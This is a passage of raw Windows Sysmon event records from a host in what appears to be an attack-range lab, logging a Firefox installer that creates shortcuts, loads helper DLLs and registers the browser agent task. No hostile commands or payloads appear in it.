10341000x800000000000000016395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.443{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe84.0.2Firefox Default Browser AgentFirefoxMozilla Foundationdefault-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" register-task 308046B0AF4A39CBC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=3A94D83189F8B95314F1B2847191CBCE,SHA256=6A68002A96543E07D6EAAE513B02231DDDD71A455623F0E1CDD7C6B93C939645,IMPHASH=C63658719CB70747321FBCA4EAE93153{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.411{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.411{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ServicesHelper.dll2021-01-18 13:59:53.411 10341000x800000000000000016383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Public\Desktop\Firefox.lnk2021-01-18 13:59:53.396 10341000x800000000000000016374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 